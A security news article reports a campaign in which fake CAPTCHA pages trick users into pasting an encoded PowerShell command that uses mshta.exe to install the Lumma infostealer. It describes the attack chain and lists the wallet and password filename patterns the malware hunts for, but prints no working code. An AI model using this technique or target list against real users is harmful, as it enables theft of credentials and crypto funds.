Prove you’re not a robot by running malware: crooks delivering stealers with fake CAPTCHAs


Would you fall for a CAPTCHA that asks you to go and delete the System32 folder? Threat actors are successfully using malicious bot detection prompts to drop the notorious infostealer Lumma.

Researchers at Qualys, a security firm, have discovered a new malicious campaign. Threat actors are leveraging CAPTCHAs, asking users to “Verify You Are Human” by running a malicious command prompt, which downloads malware.

To trick users, the prompt disguises malicious intent by automatically copying the malicious script to the system’s clipboard and asking users to paste it to the terminal window. For the victim, it appears that they just press five buttons to complete the verification, but that's enough to launch the terminal and run the code.

ADVERTISEMENT

No files are involved, and that makes this threat deceptive and persistent. The execution chain leads to the downloading of Lumma infostealer, collecting user data and files, such as passwords, and crypto wallets, and exfiltrating them to a cybercriminal-controlled server.

captcha-malicious

“Users are redirected to these fake CAPTCHA sites by bad actors exploiting legit software or public-facing applications. When the user clicks the ‘I’m not a robot’ button, verification steps are presented. Completing these steps triggers the execution of a PowerShell command,” Qualys researchers speculate.

The malicious script on the compromised web pages is encoded with Base64, making it harder to detect.

As an intermediary, attackers use a trusted Windows tool Mshta.exe to download a remote payload.

attack-chain-lumma

Lumma Stealer is one of the most capable and widespread malware-as-a-services, specializing in stealing sensitive data. This malware searches for sensitive files and data related to cryptocurrency and password text files across various directories on the compromised system.

“It specifically looks for files having keywords that suggest they may hold confidential information, such as *seed*.txt, *pass*.txt, *.kbdx, *ledger*.txt, *trezor*.txt, *metamask*.txt, bitcoin*.txt, *word*, *wallet*.txt,” the researchers noted.

ADVERTISEMENT

The malware and command-and-control servers are often hosted on legitimate Content Delivery Networks (CDNs). In this campaign, hackers relied on Cloudflare CDN.

The investigation reveals Lumma’s ability to adapt and evade detection by exploiting common tools, and reliance on embedded payloads and process injection. Previously, Lumma stealer was delivered via fake Chrome error messages, breached YouTube accounts, and even adult toys.

Qualys suggests using endpoint detection and response tools to prevent and stop the attack.